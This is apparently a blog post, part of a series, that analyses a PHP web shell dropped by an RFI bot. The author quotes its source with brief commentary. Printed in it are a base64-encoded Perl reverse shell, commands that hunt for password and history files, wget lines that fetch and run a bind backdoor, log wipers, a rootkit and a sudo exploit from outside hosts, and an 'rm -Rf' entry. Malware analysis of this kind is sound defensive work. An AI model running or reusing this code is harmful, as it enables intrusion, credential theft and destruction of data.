Casper RFI crack bot – Part 4

sh.txt
This one also looks juicy!
Another php,
<?php
$sh_id = “Q2FTcEVyX0thRUB5YWhPTy5jT20=”;
$sh_ver = “0.0 01.01.2010”;
$sh_name = base64_decode($sh_id).$sh_ver;
$sh_mainurl = “http://xxxxxx.ru/config/”;
$html_start = ”.
‘<html><head>
<title>’.getenv(“HTTP_HOST”).’ – ‘.$sh_name.'</title>
<style type=”text/css”>
<!–
What are you up to with this one?
We have lots of toys to play with.
//Authentication $login = ""; $pass = ""; $md5_pass = ""; //Password yg telah di enkripsi dg md5. Jika kosong, md5($pass). $host_allow = array("*"); //Contoh: array("192.168.0.*","127.0.0.1") $login_txt = "Restricted Area"; //Pesan HTTP-Auth $accessdeniedmess = "<a href=\"$sh_mainurl\">".$sh_name."</a>: access denied"; $gzipencode = TRUE; $updatenow = FALSE; //Jika TRUE, update shell sekarang. $c99sh_updateurl = $sh_mainurl."fx29sh_update.php"; $c99sh_sourcesurl = $sh_mainurl."fx29sh_source.txt"; //$c99sh_updateurl = "http://localhost/toolz/fx29sh_update.php"; //$c99sh_sourcesurl = "http://localhost/toolz/fx29sh_source.txt"; $filestealth = TRUE; //TRUE, tidak merubah waktu modifikasi dan akses. $curdir = "./"; $tmpdir = ""; $tmpdir_log = "./"; $log_email = "xxxxx_xxx@yahoo.com"; //email untuk pengiriman log. $sort_default = "0a"; //Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending $sort_save = TRUE; //Jika TRUE, simpan posisi pengurutan menggunakan cookies. $sess_cookie = "c99shvars"; //Nama variabel Cookie $usefsbuff = TRUE; //Buffer-function $copy_unset = FALSE; //Hapus file yg telah di-copy setelah dipaste $hexdump_lines = 8; $hexdump_rows = 24; $win = strtolower(substr(PHP_OS,0,3)) == "win"; $disablefunc = @ini_get("disable_functions"); if (!empty($disablefunc)) { $disablefunc = str_replace(" ","",$disablefunc); $disablefunc = explode(",",$disablefunc); }
A few functions on checking and reporting disk usage..
Now this is worth tracking down.
//milw0rm search $Lversion = php_uname(r); $OSV = php_uname(s); if(eregi("Linux",$OSV)) { $Lversion=substr($Lversion,0,6); $millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion; } else { $Lversion=substr($Lversion,0,3); $millink ="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion; } //End of milw0rm search
I wish milw0rm was still around so we could see what those are for 🙁
Here is a few things that are encrypted.
$back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7 DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0k QVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGll KCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsN CmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+ JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkIHYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3Rl bSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4i Ow0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
And a few others, no point in sharing 🙂
We are sure reporting back for a lot of things.
$cmdaliases = array( array("", "ls -al"), array("Find all suid files", "find / -type f -perm -04000 -ls"), array("Find suid files in current dir", "find . -type f -perm -04000 -ls"), array("Find all sgid files", "find / -type f -perm -02000 -ls"), array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"), array("Find config.inc.php files", "find / -type f -name config.inc.php"), array("Find config* files", "find / -type f -name \"config*\""), array("Find config* files in current dir", "find . -type f -name \"config*\""), array("Find all writable folders and files", "find / -perm -2 -ls"), array("Find all writable folders and files in current dir", "find . -perm -2 -ls"), array("Find all writable folders", "find / -type d -perm -2 -ls"), array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"), array("Find all service.pwd files", "find / -type f -name service.pwd"), array("Find service.pwd files in current dir", "find . -type f -name service.pwd"), array("Find all .htpasswd files", "find / -type f -name .htpasswd"), array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"), array("Find all .bash_history files", "find / -type f -name .bash_history"), array("Find .bash_history files in current dir", "find . -type f -name .bash_history"), array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), array("List file attributes on a Linux second extended file system", "lsattr -va"), array("Show opened ports", "netstat -an | grep -i listen") );
OK now this is nice!
$cmdaliases2 = array( array("wget & extract psyBNC","wget ".$sh_mainurl."fx.tar.gz;tar -zxf fx.tar.gz"), array("wget & extract EggDrop","wget ".$sh_mainurl."fxb.tar.gz;tar -zxf fxb.tar.gz"), array("-----",""), array("Logged in users","w"), array("Last to connect","lastlog"), array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"), array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"), array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"), array("Downloaders?","which wget curl w3m lynx fetch lwp-download"), array("CPU Info","cat /proc/version /proc/cpuinfo"), array("Is gcc installed ?","locate gcc"), array("Format box (DANGEROUS)","rm -Rf"), array("-----",""), array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"), array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"), array("Run WIPELOGS PT3","./zap2"), array("-----",""), array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"), array("wget & run BindDoor","wget ".$sh_mainurl."toolz/bind.tar.gz;tar -zxvf bind.tar.gz;./4877"), array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"), );
Looking for a few more things. We pull down some log wipers, from packetstorm, and grab RatHole 1.2 from the same place, and a local sudo exploit.
This is a big one, I will have to continue this tomorrow.
 Comment on this Post